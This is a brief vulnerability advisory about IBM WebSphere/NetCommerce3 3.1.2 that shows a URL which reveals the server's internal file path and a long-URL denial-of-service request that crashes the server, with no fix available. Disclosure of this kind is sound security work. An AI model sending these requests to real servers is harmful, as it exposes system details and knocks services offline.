|
Vulnerability IBM Websphere/NetCommerce3 Affected IBM Websphere/NetCommerce3 3.1.2 Description ET LoWNOISE posted following. Path revealing problem: http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK Result: DTWP029E: Net.Data is unable to locate the HTML block NOEXISTINGHTMLBLOCK in file /usr/NetCommerce3/macros/en_US/macro.d2w DoS with Long URL: http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(aprox 1000)..%0a On UNIX and NT Netcommerce will crash: Server Not Responding. Solution Nothing yet.